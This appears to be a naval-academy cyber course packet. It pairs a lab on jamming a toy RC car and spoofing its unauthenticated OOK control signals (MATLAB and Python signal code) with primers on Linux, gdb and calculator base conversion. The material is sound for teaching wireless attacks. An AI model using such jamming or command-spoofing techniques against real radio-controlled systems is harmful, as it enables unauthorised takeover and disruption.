We devoted an entire third of this course to learning about wireless communications systems and the associated considerations, from modulation to gain to antennas and signal propagation. Why? Because “Cyber” doesn’t exist solely in a single computer or a closed network. You can have a significant impact by using Electronic Warfare as an enabler for Cyber attacks. See: http://breakingdefense.com/2013/04/adm-greenert-wireless-cyber-em-spectrum-changing-navy/

Now we’re going to put all that knowledge to the test and apply your cyber skills in a wireless environment.

Set-up. Equipment required:
□ Your issued Laptop
□ MATLAB Code RCcode.m and getkey.m
  o Located in the EC310 Spring 2014 folder on your Desktop (EC310 Spring 2014\Wireless\Lab 27 Files)
□ LeCroy “Wave Surfer” 104MXS 1GHz Oscilloscope
□ Anritsu MS2711D Spectrum Analyzer
□ Telescoping Antenna w/ BNC connector
□ RC Vehicle
□ Signal Generator & accessories (Instructor will set up)
□ TURN OFF YOUR CELL PHONE! (The next hour of your life will be easier if your cell phone isn’t adding noise to the Electromagnetic Spectrum.)

Part I: Data Collection

Communications System. For this Security Exercise, we’ll explore the entire communications system employed by a Radio Control (RC) vehicle… And then we’ll exploit it! Answer the questions that follow to examine the RC vehicle’s communications.

Note: These images resemble the models in your classroom enough to give you the general idea. We can’t all have Ferraris, after all!

Question 1: Which image above (left or right) most closely represents the transmitter?
Question 2: Where is the receiver located?
Question 3: What type of channel does this communications system involve?
Question 4: What do you expect your “information” to be in this case?
Question 5: What will happen when the “information” is recovered at the receiver?
Question 6: What type of antenna does the transmitter use?
Question 7: What would you expect the beam pattern of this antenna to look like?
Question 8: Do the transmitter or receiver give any indication of carrier frequency? If so, what is fc?

To verify the carrier frequency of the transmitted signal, use the Anritsu MS2711D Spectrum Analyzer.
□ Press "Recall Setup" (Hard Key #6)
□ Ensure "Default" is highlighted
□ Press "Enter"
□ Set "Center" to the carrier frequency determined in the previous question.
□ Set "Span" to 200 kHz
□ Transmit from the RC vehicle controller (ensure power is on); the signal will display on the spectrum analyzer

Question 9: What is the carrier frequency? Draw the signal in the frequency domain.

Part II: Jamming

Now that we have some basic intel, what could happen if your instructor was to transmit a signal at the carrier frequency? The answer: It depends! In lecture, we learned that the effectiveness of electronic attack/jamming depends on the jamming-to-signal ratio (J/S). The J/S depends on the power the car receives from the jammer and from the transmitter, which in turn depends on how far the jammer and the transmitter are from the receiver. In this security exercise, our scenario looks like this:

[figure: exercise scenario]

The J/S depends on the received signal power at the car and the received jamming power at the car:

$$(J/S)_{\mathrm{dB}} = \left(\frac{P_J}{P_S}\right)_{\mathrm{dB}} = P_J\,(\mathrm{dBm}) - P_S\,(\mathrm{dBm})$$

Generally, if the J/S ratio is greater than 1 (i.e., greater than 0 dB), jamming will be effective.

□ Play time! Drive your vehicle around the classroom.

Question 10: What two conditions (with regard to frequency and received power) must exist for jamming to be effective?

Get your instructor's signature to continue.

□ Your instructor will generate a 20 dBm frequency modulation (FM) signal at the carrier frequency.

Question 11: What is your instructor's target?

□ While your instructor is transmitting the jamming signal, experiment! Attempt to control the RC car with its transmitter at different distances from both the jammer and the RC car.
Question 12: When your instructor transmitted a jamming signal, were you still able to control the RC car? When could you control it? When couldn't you?
Question 13: Use the Anritsu MS2711D Spectrum Analyzer to draw the jamming signal in the frequency spectrum. How does this change if you transmit while standing next to the spectrum analyzer?
Question 14: How could you increase the range of the jammer? (How does jamming range depend on signal power?)

Part III: Reverse Engineering

So now we know the carrier frequency and the effects of transmitting a higher signal power on that frequency, but if we want to make a bigger impact, we need to know more about the RC car's signal. What does the transmitted signal look like? What type of modulation does it use? How do the controls work? To accomplish this, we're going to look at the signal using the LeCroy "Wave Surfer" 104MXS 1 GHz oscilloscope.

First, some initial set-up for the O-scope (see the figure that follows for button locations):
□ Touch the yellow box in the lower left corner of the touch screen to configure Channel 1 with the following settings:
  o Set Volts/div to 20 mV
  o Set Coupling to DC50
  o Set "Trigger" to 25.0 mV
  o Touch "Timebase" to set Time/Division to 5.00 ms/div
  o Press "Close" (top right corner of the Channel 1 menu)

Once you've set up your channel configuration on the O-scope, it's time to capture the signal.
□ In the "Trigger" section of the O-scope display, select "Normal".
□ Holding the RC car transmitter close to the O-scope, send the "forward" signal by driving the car forward. Ensure the antenna is extended!
□ When your signal is displayed on the screen, press "Stop" on the Trigger menu while still sending the "forward" signal.

If done correctly, your O-scope display should look similar* to this:

* Captured signal may vary; that's ok for now!

Question 15: What type of digital modulation does this car use?
Question 16: What pattern of 0s and 1s does the transmitted signal represent?
To be able to control the RC car, we want to do more than just drive it forward. How does the signal change for reverse, left, or right? Think about the controls: how many different signals do you expect to control the car? In addition to driving forward, the car can operate in reverse, as well as turning left and right... and any combination thereof! There are actually 8 different combinations of signals, but in the interest of time we're only going to worry about four: Forward, Reverse, Forward & Right, and Forward & Left. Here's the catch: the chips that process the signal and control the vehicle's motion aren't necessarily wired the same way in every car, so you need to identify which control operation each transmitted signal represents!

Examine each transmitted signal by repeating the process you just followed to capture the signal:
□ In the "Trigger" section of the O-scope display, select "Normal".
□ Transmit the desired signal.
  o Forward
  o Reverse
  o Forward AND Right (This is different from the signal to pivot the wheels to the right only!)
  o Forward AND Left (This is different from the signal to pivot the wheels to the left only!)
□ When your signal is displayed on the screen, press "Stop" on the Trigger menu.

Question 17: Match the transmitted signals (shown on the following page) with the operations they represent by circling the correct response. The signals can be distinguished by the number of 1s being transmitted after the 4 large sync pulses.

Forward or Reverse or Forward-Right or Forward-Left?? (# of 1's: 10)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1's: 40)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1's: 34)
Forward or Reverse or Forward-Right or Forward-Left?? (# of 1's: 28)

Question 18: Now that you've identified the modulated signal that controls the car, could you determine the baseband binary signal (voltage pulses) that is used for each control function?
The block diagram for an OOK signal's generation is shown below.

[figure: OOK modulator block diagram]

We now know the bits that are transmitted to control the forward, turning, and reverse motions of the RC car. We also know that we can't transmit the baseband binary signal directly, so we need to modulate it onto a high-frequency carrier. If we could reproduce these control signals and transmit them by some means other than the car's remote, do we need the remote to drive the RC car? Let's find out!

Part IV: The Hook

In this section, you'll use the MATLAB code provided and your laptop sound card to generate and transmit control signals to the RC car. You may have noticed that each transmitted signal consists of 4 wide "sync" pulses followed by a trail of 0's and 1's. Since you've already matched the waveform to the driving direction, now all you need to do is determine the number of 1's in the trail following the sync pulses. For example, the image below represents

01110111011101110101010101010101010101110

in binary (check back to HW23 if you're not a believer yet; you knew this way back when!). For this sequence of bits, the organization is as follows. On the oscilloscope, the control signal will be displayed as seen in the next figure.

Question 19: Fill in the table by entering the number of 1's trailing the sync pulses for each RC car operation determined in Question 18. You must find the exact value!

    Direction    Number of 1's in trail
    Forward      ____
    Reverse      ____
    Right        N/A
    Left         N/A
    Fwd-Right    ____
    Fwd-Left     ____
    Rev-Right    N/A
    Rev-Left     N/A

The MATLAB code takes input from the arrow keys on your laptop, generates the baseband binary signals to control the RC vehicle, then modulates the signal with OOK. Since we only determined the binary waveform for 4 of the 8 possible operations, we'll be slightly limited in the operation of our RC vehicle: we won't be able to turn while operating in reverse.
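The following Python script is an added example; it is not part of the EC310 notes and is not the course's RCcode.m (which is MATLAB and follows below). It builds the same frame the text describes, the four-pulse sync word followed by a trail of "1 0" pairs, OOK-modulates it onto a 10 kHz IF the way the MATLAB code does, and then adds the receiver side that the lab only observes on the oscilloscope: a noncoherent envelope detector that recovers the bits and counts the 1's after the sync word, which is exactly how Question 17 tells the four commands apart. The sync pattern, samples per symbol, sample rate and IF are taken from the MATLAB constants; the trail lengths 10, 28, 34 and 40 used in the demo are the ones listed in Question 17 and imply nothing about which direction each one is.

```python
import math

# Constants mirrored from RCcode.m
SYNC = [1, 1, 1, 0] * 4     # four wide sync pulses: 1110 1110 1110 1110
SAM_PER_SYM = 22            # samples per bit: fs / Rb, Tb ~ 500 us
FS = 44.1e3                 # sound-card sample rate
F_IF = 10e3                 # 10 kHz "baseband" (IF) carrier


def build_frame(n_ones):
    """Control word: sync word followed by n_ones repetitions of '1 0'."""
    if n_ones < 1:
        raise ValueError("trail must contain at least one 1")
    return SYNC + [1, 0] * n_ones


def upsample(bits, sps=SAM_PER_SYM):
    """Hold each bit for sps samples: a unipolar NRZ waveform."""
    return [b for b in bits for _ in range(sps)]


def ook_modulate(bits, sps=SAM_PER_SYM, fs=FS, f_if=F_IF):
    """On-off keying: NRZ times a cosine carrier, so the carrier is on for a 1, off for a 0."""
    nrz = upsample(bits, sps)
    return [nrz[n] * math.cos(2 * math.pi * f_if * n / fs) for n in range(len(nrz))]


def ook_demodulate(samples, sps=SAM_PER_SYM, threshold=0.1):
    """Noncoherent detection: mean |x| over each bit period, compared to a threshold.

    The mean of |cos| over a bit period is about 2/pi (roughly 0.64) when the carrier
    is present and 0 when it is absent, so a threshold of 0.1 sits safely between them.
    """
    bits = []
    for start in range(0, len(samples) - sps + 1, sps):
        envelope = sum(abs(s) for s in samples[start:start + sps]) / sps
        bits.append(1 if envelope > threshold else 0)
    return bits


def count_trail_ones(bits):
    """Find the sync word and count the 1's that follow it (Question 17's discriminator)."""
    n = len(SYNC)
    for i in range(len(bits) - n + 1):
        if bits[i:i + n] == SYNC:
            return sum(bits[i + n:])
    raise ValueError("sync word not found")


def round_trip(n_ones):
    """Modulate a frame, demodulate it, and report the recovered trail count."""
    return count_trail_ones(ook_demodulate(ook_modulate(build_frame(n_ones))))


if __name__ == "__main__":
    for n in (10, 28, 34, 40):   # the four trail lengths listed in Question 17
        print(f"trail of {n} ones -> recovered {round_trip(n)}")
```

The point of the decoder half is that nothing in the frame authenticates the sender: any transmitter that reproduces the sync word and the right trail length on the right carrier is indistinguishable from the car's own remote, which is what Part IV goes on to exploit.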
□ In MATLAB, update the "Setup Major Variables" section of your RCcode.m code (shown below) with the number of 1s in the "trail" in preparation for taking over the RC vehicle.

    %%%%%%%%%%%%%%%%
    % RC CAR CODE %
    %%%%%%%%%%%%%%%%
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %                                       %
    %   PRESS SPACE TO TERMINATE EXECUTION  %
    %                                       %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    %
    % !!!!! NOTE !!!!!
    % If you do something wrong and Matlab terminates unexpectedly (you get a
    % lot of angry red Error messages) you will have to close out and restart
    % Matlab in order to clear out the sound card buffer!!!
    %
    % Forward       = Up Arrow
    % Reverse       = Down Arrow
    % Forward Right = Right Arrow
    % Forward Left  = Left Arrow
    %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    % Clear out memory and initialize default settings       %
    % DO NOT CHANGE THIS SECTION                             %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    clear all
    close all
    set(0, 'DefaultAxesFontSize', 14)
    set(0, 'DefaultAxesFontWeight', 'Bold')

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    % Setup major variables                                  %
    % CHANGE THIS SECTION ONLY!!! (FOLLOW LAB INSTRUCTIONS)  %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    % Insert the number of 1's from the Question 19 table for each operation here!
    forward_1s   = 01;
    reverse_1s   = 01;
    right_fwd_1s = 01;
    left_fwd_1s  = 01;
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    sam_per_sym = 22;        % fs/Rb = 44.1e3/(1/Tb), Tb ~ 500 us
    fs  = 44.1e3;            % Set sampling rate to sound card rate
    Rb  = fs./sam_per_sym;   % Resulting bit rate
    fif = 10e3;              % 10.0 kHz "baseband" (IF) frequency
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    % Generate the original data to manipulate the car       %
    % DO NOT CHANGE THIS SECTION                             %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    sync      = [1 1 1 0 1 1 1 0 1 1 1 0 1 1 1 0];      % four wide sync pulses
    forward   = [sync repmat([1 0], 1, forward_1s)];   % sync + trail of "1 0" pairs
    reverse   = [sync repmat([1 0], 1, reverse_1s)];
    right_fwd = [sync repmat([1 0], 1, right_fwd_1s)];
    left_fwd  = [sync repmat([1 0], 1, left_fwd_1s)];
    pause     = zeros(1,500);   % silence sent when no arrow key is held (note: shadows MATLAB's pause())
    key       = 0;              % Initial keyboard value

    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    % Reads inputs once per second                        %
    % DO NOT CHANGE THIS SECTION                          %
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
    while key ~= 32                       % Press space to stop
        key = getkey(1);                  % getkey.m: waits up to 1 s for a key code
        if key == 30                      % Up arrow
            data = repmat(forward, 1, 8);
        elseif key == 31                  % Down arrow
            data = repmat(reverse, 1, 8);
        elseif key == 29                  % Right arrow
            data = repmat(right_fwd, 1, 8);
        elseif key == 28                  % Left arrow
            data = repmat(left_fwd, 1, 8);
        else
            data = pause;
        end

        % Upsample the bits to a unipolar NRZ waveform: hold each bit for sam_per_sym samples
        time_stop = length(data).*sam_per_sym;
        up_data   = zeros(1,time_stop);
        time      = linspace(0,(1/fs).*time_stop, length(up_data));
        for i = 0:length(data)-1
            up_data(sam_per_sym.*i + 1 : sam_per_sym.*i + sam_per_sym) = data(i+1);
        end

        % Generate the "baseband" (IF) OOK waveform and play it through the sound card
        s_lo = cos(2.*pi.*fif.*time);
        s_if = s_lo.*up_data;
        soundsc(s_if,fs)
    end
    %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

□ When your code is updated, run it (press the run button).
□ Follow the next instruction carefully! Double-click your cursor in the MATLAB Command Window. If all went as planned you should see a window opening and closing rapidly.
□ Press and hold your arrow keys to simulate driving your vehicle.

Question 20: What do you hear? What type of signal is being generated?
Question 21: What do you need to do to transmit this baseband binary signal so that the car receives it?

Get your instructor's signature to continue.

Your instructor will use the same signal generator that transmitted the jamming signal in Part II to transmit the modulated ASK signal. The set-up looks like this:

[figure: transmit set-up]

□ Bring your laptop to your instructor and get ready to drive!

Question 22: Do you need the car's transmitter to control the car? What just happened? What is now controlling the car?
Question 23: List some examples of how this might be significant in a military setting. Need ideas? Check this out! http://www.engr.utexas.edu/features/humphreysspoofing

Appendices

Basic Linux Commands

The information below presumes you are familiar with the Linux file system and that you understand how to refer to files and directories using absolute and relative pathnames. You should also be familiar with the commands cd (change directory) and ls (list). This prerequisite information is available in the handout named The Linux File System, available as a link under the Resources tab on the EC310 course website.

We will now address some basic file and directory operations.

To copy a file from one location to another, we use the cp command. For example, in the file system below, if dane was in his home directory and wanted to give bob a copy of the file named homework4, placing it directly in bob's home directory, he would type

    cp Cyber/homework4 ../bob

where Cyber/homework4 is the item to be copied and ../bob is where the copy is to be placed.

To create a file from scratch, you can open the file using nano, as you've done for all the programs you've entered in EC310.
To move a file, we use the mv command. In the file system shown above, if user dane wanted to move the file named spoofing to place it under the Cyber directory, he would enter

    mv spoofing Cyber

To view a file, we use the command cat followed by the filename (if it is in your working directory) or cat followed by the absolute or relative pathname (if the file is not in your working directory).

To remove a file, use the command rm followed by the file name (or pathname as applicable).

We can, in like manner, create a new directory using mkdir followed by the directory name (if we want to place the directory right under the working directory) or mkdir followed by the pathname where we want to place the new directory.

Finally, we can delete directories by using the command rmdir followed by the directory name or pathname as appropriate. Note that rmdir can only remove an empty directory, so to delete a directory you must first delete all of its contents.

You should realize that we have only scratched the surface of using the Linux bash shell. You should not place "Linux System Programmer" on your resume. But what you have learned, along with your use of the gcc compiler, the gdb debugger and permission management (covered in Lessons 8 and 9), is more than enough for EC310.

The Linux File System

1. Introduction

All users of a Linux OS have an account name (also referred to as a user name or a login name) and a password. When your Linux account is created, you are also given a home directory where all of your files and folders will reside. Your home directory has the same name as your account name. You may be wondering: Hey, I'm using Linux in EC310 and I was never asked for an account name and password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux "already open" for you.
We have, however, changed your account name to midshipman since that is, after all, your first name. You have been entering commands using the bash shell as your command line interface. Every time you have entered a command such as

    gcc -g smith_2_1.c

or

    nano smith_2_1.c

you have entered that command at the bash shell's prompt. The bash shell's prompt for ordinary users is the dollar sign. Before the prompt, you will see your account name and your computer's name.

[figure: the prompt, with labels: your account name, your computer's name, the prompt]

There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home directory.

If you wander up to a computer and notice that someone is logged on, and the prompt shows the account name joe, then the user whose account name is joe has logged in but has forgotten to log out. Shame on him. Too bad.

If you ever forget who you are, even though your account name is staring you in the face, you can enter:

    whoami

In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows terminology, these are referred to as folders), which hold files (or other directories).

A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory. When you log on, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location for any directories or files that you create. You can leave your home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working directory.

A typical Linux file system (also called a directory structure) might look like this:

[figure: directory tree rooted at /, with home directories joe, dane and bob under /home; dane contains Hacking, Cyber and spoofing, and bob contains Acme and Ramshead]

At the very top is the root directory, denoted /. The root directory contains all directories and files.

2. Absolute Pathnames

Every file can be referenced by its absolute pathname, which starts at the root directory and traipses down the inverted tree structure, with each entry separated by a forward slash. For example, the absolute pathname for the directory joe is

    /home/joe

Note that in an absolute pathname, the slash (/) character has two different meanings. The first slash always refers to the root directory. Any other slashes that may be present simply serve as separators.

Since absolute pathnames can be long, a few shortcuts are provided:
To specify a directory or file in your current directory, you can use just the name of the directory or file.
A tilde serves as an abbreviation for your own home directory.
A tilde followed by another user's name serves as an abbreviation for that other user's home directory.

In the Linux command line, preceding the prompt, you are also provided with an indication of your current working directory. If you are in your home directory (which, as an absolute pathname for our classwork in EC310, might be something like /home/midshipman), this will appear as just a tilde since, recall, a tilde serves as an abbreviation for your own home directory.

3. Relative Pathnames

Whereas absolute pathnames always start from the root, relative pathnames start from your current location (i.e., your working directory). The notation relies on the use of two dots (..) to serve as an abbreviation for the immediate parent of the current directory.

As an example, in the picture above, if your working directory is dane, the relative pathname of the home directory is simply:

    ..

On the other hand, if your working directory is bob, the relative pathname of the directory Hacking would be ../dane/Hacking. In other words, to get from bob to Hacking, you first must go up one directory to home (the parent directory, represented by the two dots), then from home you go down one directory to dane, and then down to Hacking.
Another shortcut is also available for use in relative pathnames. A single dot (.) can be used as shorthand notation for your current working directory.

4. Listing Files

You can list the contents of the working directory by using the ls command. For example, if, in the picture above, your working directory was dane, then the command

    ls

would yield the results:

    Hacking  Cyber  spoofing

You can list the files in a different directory by typing ls followed by the absolute or relative pathname of the directory you are seeking information about. For example, if your working directory was dane and you entered

    ls ../bob

the result would be:

    Acme  Ramshead

5. Changing Your Working Directory

To change your working directory to another directory, simply enter the command cd followed by the directory you wish to change to. For example, if your working directory was dane, you could change your working directory to bob by entering

    cd ../bob

When you change your working directory, the command line will update to indicate your new working directory. For example, if I am the user named midshipman and I change my directory to a subdirectory named work, my new prompt will show the working directory as ~/work.

If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply typing cd by itself. You may have already noticed that we have changed our working directory at the start of most security exercises by typing:

    cd booksrc

6. The root User

Every Linux system has a special user named root. The root user is the great-and-all-powerful system administrator of the Linux system. The root user can access any file on the system, including the files of individual users. The root user can read the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system (e.g., programs). The root user owns the system.
The dream of all hackers is to somehow become the root user. In Linux, the root user has a special prompt, the pound sign (#). If you walk up to a computer and see this:

[figure: a prompt ending in #]

that means the root user has logged in and left the computer unattended. That would be bad.

Brief Primer on gdb

Getting started. Assume our C program is named test.c. The program is shown below.

    #include<stdio.h>
    int main( )
    {
        int a = 2;
        int b = 1000;

        char x = '$' ;

        char phrase[4] = "Fun" ;

        printf( "Yes");

        printf("No");
    }

To run the debugger on the compiled version of test.c, always start by entering:

    gcc -g test.c
    gdb -q ./a.out
    set dis intel
    list

If your source code is more than 10 lines, you may have to hit enter again to list the next 10 lines. We see this:

    midshipman@EC310-VM:~ $ gcc -g test.c
    midshipman@EC310-VM:~ $ gdb -q ./a.out
    Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
    (gdb) set dis intel
    (gdb) list
    1       #include<stdio.h>
    2       int main( )
    3       {
    4           int a = 2;
    5           int b = 1000;
    6
    7           char x = '$' ;
    8
    9           char phrase[4] = "Fun" ;
    10
    (gdb)
    11          printf( "Yes");
    12
    13          printf("No");
    14      }
    (gdb)

The line numbers shown on the left can be very useful for setting breakpoints. For example, if I wanted to run the program but have it pause right between the two final printf statements, I would enter

    break 12
    run

(You have already seen us set a breakpoint at main by entering break main; this is the same idea.)

Looking at Memory

Based on our program, we should have the following items stored in memory:

    2
    1000
    '$'
    "Fun"

The strings "Yes" and "No" are also in memory somewhere, but we'll concentrate just on the integers 2 and 1000, the character '$' and the string "Fun". If I were to look into memory, I would see this (where all values are hexadecimal):

[figure: memory dump around 0xbffff808]

Looking at this section of memory, it may not be obvious where items are stored.
Here is where the integers 2 and 1000, the character '$' and the string "Fun" are placed:

[figure: the same memory dump, annotated with the locations of 2, 1000, '$' and "Fun"]

The string "Fun"

Consulting the handy-dandy ASCII table, we see:

    Character    ASCII hexadecimal value
    F            46
    u            75
    n            6e

So, sure enough, there it is at memory location bffff808. You should also note that the NULL terminator appears as the character immediately following the 'n' in "Fun".

Looking at the memory dump above, try to guess what will be displayed by each of the following commands. (The answers immediately follow.)

    (a) x/xb 0xbffff808
    (b) x/xh 0xbffff808
    (c) x/xw 0xbffff808
    (d) x/s  0xbffff808

Answers:

    (a) 46          (displays a byte)
    (b) 7546        (displays two bytes)
    (c) 006e7546    (displays four bytes)
    (d) "Fun"       (displays as a string)

For (b) and (c), note the annoying little-endian ordering.

We can specify the number of units we wish to have printed out by placing a number after the slash. For example, looking at the memory dump above, try to guess what will be displayed by each of the following commands. (The answers immediately follow.)

    (a) x/xb 0xbffff808
    (b) x/2b 0xbffff808
    (c) x/3b 0xbffff808
    (d) x/4b 0xbffff808
    (e) x/2h 0xbffff808

Answers:

    (a) 46                      (displays a byte)
    (b) 0x46 0x75               (displays two bytes)
    (c) 0x46 0x75 0x6e          (displays three bytes)
    (d) 0x46 0x75 0x6e 0x00     (displays four bytes)
    (e) 0x7546 0x006e           (notice that each half-word is presented in annoying little-endian order)

If we suspect that characters are being stored, we can ask that the display be presented as characters by specifying the c format. Looking at the memory dump above, try to guess what will be displayed by each of the following commands. (The answers immediately follow.)

    (a) x/c  0xbffff808
    (b) x/2c 0xbffff808
    (c) x/3c 0xbffff808
    (d) x/4c 0xbffff808

Answers:

    (a) 70 'F'
    (b) 70 'F'  117 'u'
    (c) 70 'F'  117 'u'  110 'n'
    (d) 70 'F'  117 'u'  110 'n'  0 '\000'

Suppose we thought an integer was stored at address 0xbffff808.
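Before checking that guess with x/dw, here is an added Python example (not from the EC310 notes) that models this memory dump as a byte string and reproduces gdb's x/ output for the formats the primer uses, x/xb, x/xh, x/xw, x/dw, x/db, x/c and x/s, with Python's struct module doing the little-endian interpretation that the notes keep calling annoying. The byte values at 0xbffff808 through 0xbffff813 ("Fun" with its NUL, the '$' at 0xbffff80f, and 1000 at 0xbffff810) are the ones the page states. Two things are assumptions of this example and not taken from the page: the three bytes between the string's terminator and the '$' are filled with zeros, and the word at 0xbffff814 is given the value 2 (the program's int a), a layout consistent with the dump but not shown in it.

```python
import struct

# Constructed memory image starting at BASE, modelled on the page's dump.
# Offsets 0..3:   "Fun\0"          (page: string at 0xbffff808)
# Offsets 4..6:   padding zeros    (assumption: contents not stated on the page)
# Offset  7:      '$' = 0x24       (page: char at 0xbffff80f)
# Offsets 8..11:  1000 = 0x3e8, little-endian e8 03 00 00   (page: int at 0xbffff810)
# Offsets 12..15: 2, little-endian 02 00 00 00   (assumption: int a at 0xbffff814)
BASE = 0xbffff808
MEMORY = b"Fun\x00" + b"\x00\x00\x00" + b"$" + b"\xe8\x03\x00\x00" + b"\x02\x00\x00\x00"

# gdb unit letters -> (size in bytes, little-endian unsigned struct code)
UNITS = {"b": (1, "<B"), "h": (2, "<H"), "w": (4, "<I")}
SIGNED = {"b": "<b", "h": "<h", "w": "<i"}


def read(addr, size):
    """Fetch size bytes at absolute address addr from the constructed image."""
    off = addr - BASE
    if off < 0 or off + size > len(MEMORY):
        raise ValueError(f"address {addr:#x} outside the constructed image")
    return MEMORY[off:off + size]


def x(fmt, addr):
    """Emulate gdb's `x/<count><format><unit> <addr>` for the formats used in the notes.

    fmt is the text after the slash, e.g. "xb", "2h", "dw", "3c", "s".
    Returns a list of strings, one per unit, formatted roughly as gdb prints them.
    """
    count = int("".join(ch for ch in fmt if ch.isdigit()) or "1")
    letters = [ch for ch in fmt if ch.isalpha()]
    unit = next((ch for ch in letters if ch in UNITS), None)
    form = next((ch for ch in letters if ch in "xdcs"), "x")

    if form == "s":                       # string: bytes up to the first NUL
        raw = read(addr, len(MEMORY) - (addr - BASE))
        return [raw.split(b"\x00", 1)[0].decode("latin-1")]
    if form == "c":                       # characters are always one byte
        unit = "b"
    if unit is None:                      # gdb's default unit is a word
        unit = "w"

    size, code = UNITS[unit]
    out = []
    for i in range(count):
        chunk = read(addr + i * size, size)
        if form == "x":
            out.append(f"{struct.unpack(code, chunk)[0]:0{2 * size}x}")
        elif form == "d":
            out.append(str(struct.unpack(SIGNED[unit], chunk)[0]))
        else:                             # "c": decimal value and the character
            val = chunk[0]
            shown = chr(val) if 32 <= val < 127 else f"\\{val:03o}"
            out.append(f"{val} '{shown}'")
    return out


if __name__ == "__main__":
    for cmd in ("xb", "xh", "xw", "s", "4b", "2h", "4c", "dw"):
        print(f"x/{cmd} {BASE:#x}: {' '.join(x(cmd, BASE))}")
    print(f"x/xb 0xbffff80f: {x('xb', 0xbffff80f)}")    # the '$'
    print(f"x/d  0xbffff810: {x('dw', 0xbffff810)}")    # 1000
    # A word read that starts on 1000's last byte straddles two variables:
    print(f"x/d  0xbffff813: {x('dw', 0xbffff813)}")    # bytes 00 02 00 00 -> 512
```

The last line is the reason unaligned reads are so confusing in a debugger: gdb happily assembles a word from whatever four bytes begin at the address you give it, and the little-endian order means the high byte of one variable becomes the low byte of the result.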
We could check this by entering

    x/dw 0xbffff808

If we do this, we see:

    0xbffff808:     7238982

Can you guess where on Earth this value 7238982 comes from?

Answer: We saw earlier that entering x/xw gave us 006e7546. If we convert the hexadecimal value 006e7546 to a decimal integer, we find its value is 7238982.

The character $

Looking at the memory dump above, we see the $ character is stored at location bffff80f. Try to guess what will be displayed by each of the following commands. (The answers immediately follow.)

    (a) x/xb 0xbffff80f
    (b) x/c  0xbffff80f
    (c) x/db 0xbffff80f
    (d) x/s  0xbffff80f

Answers:

    (a) 0x24
    (b) 36 '$'
    (c) 36
    (d) $�\003

Note that 0x24 equals 36 in decimal, and that the last item is gibberish because a string is not stored in this location.

The integer 1000

So, first, we should convert the decimal value 1000 to hexadecimal. If we do this, we find it is equal to 0x3e8. With reference to the memory dump above, answer the following questions.

    (a) Why is 1000 stored in four bytes if it only needs two bytes?
    (b) Presuming this value does take four bytes, and thus is equal to 0x000003e8, why is it not stored with the leading two zeros at the "top" memory locations?

Answers:

    (a) All integers are stored in four bytes, even if fewer are needed.
    (b) Little endian, little endian, little endian.

Looking at the memory dump above, try to guess what will be displayed by each of the following commands. (The answers immediately follow.)

    (a) x/xb 0xbffff810
    (b) x/xh 0xbffff810
    (c) x/d  0xbffff810
    (d) x/2c 0xbffff810

Answers:

    (a) 0xe8
    (b) 0x03e8
    (c) 1000
    (d) gibberish

So... do you think you get it? To see, try this: Your friend types

    x/d 0xbffff813

and sees that the result is 512. Explain!

Performing Base Conversions on the TI-nSpire CAS Calculator

Performing base conversions on your TI-nSpire calculator is relatively straightforward.
Becoming proficient at using your calculator this way will be useful to you throughout the course, especially as we begin to perform complex mathematical operations in different number bases.

1. Setup

To begin, ensure that your calculator is set up in the "Auto" calculation mode and the "Decimal" base system. Your calculator is probably already set up this way, but check it just to be sure. To check these settings use the following key sequence:

    Press [home]
    Press 5: Settings
    Press 2: Document Settings

Your screen should now look similar to this:

[figure: Document Settings screen]

Use the navigation pad to move down to the Calculation Mode setting.

[figure: the navigation pad]

If you get to the Calculation Mode setting and it's not set to "Auto", then push the navigation pad to the right to bring up the menu of Calculation Mode options. Use the navigation pad to move up or down to select "Auto", then press the enter key.

Repeat this procedure to ensure the Base is set to Decimal. Once the Calculation Mode and Base are properly set, repeatedly press down on the navigation pad until OK is highlighted and press the enter key. If you see the dialog box below, press the enter key to select OK.

[figure: confirmation dialog]

2. Conventions

Now that your calculator is set up properly, the following conventions apply:

    Decimal numbers are typed with no special notation (e.g. 2015).
    Hexadecimal numbers are typed by preceding the number with "0h". That's a zero, not the letter "O" (e.g. 0h3EA).
    Binary numbers are typed by preceding the number with "0b". Again, it's a zero, not the letter "O" (e.g. 0b100101).

3. The Conversion Operator

Conversion among different bases is handled through the use of the "conversion operator". It's a single character that looks like a right-facing sideways triangle: ►

